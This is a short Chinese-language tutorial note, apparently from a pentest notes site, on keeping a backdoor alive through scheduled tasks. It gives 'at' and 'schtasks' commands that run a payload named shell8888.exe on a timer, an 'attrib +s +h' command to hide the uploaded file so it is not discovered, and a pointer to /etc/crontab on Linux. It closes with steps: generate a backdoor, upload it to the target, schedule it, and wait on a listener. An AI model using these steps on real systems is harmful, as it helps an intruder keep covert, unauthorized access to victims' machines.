企业🤖AI智能体构建引擎,智能编排和调试,一键部署,支持知识库和私有化部署方案 广告
[TOC] ## 原理 计算机当中有个计划任务,当达到设置的时间以后,该任务就会按照设置的去执行响应的文件,甚至可以设置为每小时的什么点就开始执行后门程序 ## win7 ~~~ at 时间 执行文件.exe ~~~ ## win10 * 不支持at命令的,可以使用schtasksi命令 1. 创建计划任务: ``` schtasks /create /tn test /sc daily /st 19:17 /tr C:\Users\28911\Desktop\payload\shell8888.exe ``` 1. 查询计划任务: ``` schtasks /query /tn test ``` 1. 删除计划任务: ``` schtasks /delete /tn test ``` ## 隐藏上传文件 * 为了避免被发现,上传之后可以使用 attrib 命令将文件隐藏 * +s 表示设置系统属性,+h 表示设置隐藏属性 * 例如:attrib +s +h shell8888.exe ## linux ~~~ vim /etc/crontab ~~~ ## 利用 * 生成后门文件 * 上传到目标机 * 利用计划任务,设置时间执行该后门 * 攻击机打开监听,等待目标执行